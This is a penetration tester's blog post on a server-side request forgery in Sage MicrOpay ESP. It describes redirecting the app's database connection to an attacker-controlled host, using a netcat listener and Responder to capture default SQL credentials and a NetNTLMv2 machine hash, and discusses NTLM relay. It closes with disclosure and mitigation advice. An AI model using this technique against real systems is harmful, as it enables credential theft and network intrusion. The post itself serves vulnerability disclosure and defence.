Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include pl, sh, exe, and in this instance, .dll.

Image Source

Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do, I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we can get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.

So we have a web application on the inside… and it thinks I’m it’s database server…

Image Source

I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on formatting it like this:

…which made my Responder go off like crazy.

Image Source

For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed through the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.

 

Leave a Reply

Your email address will not be published. Required fields are marked *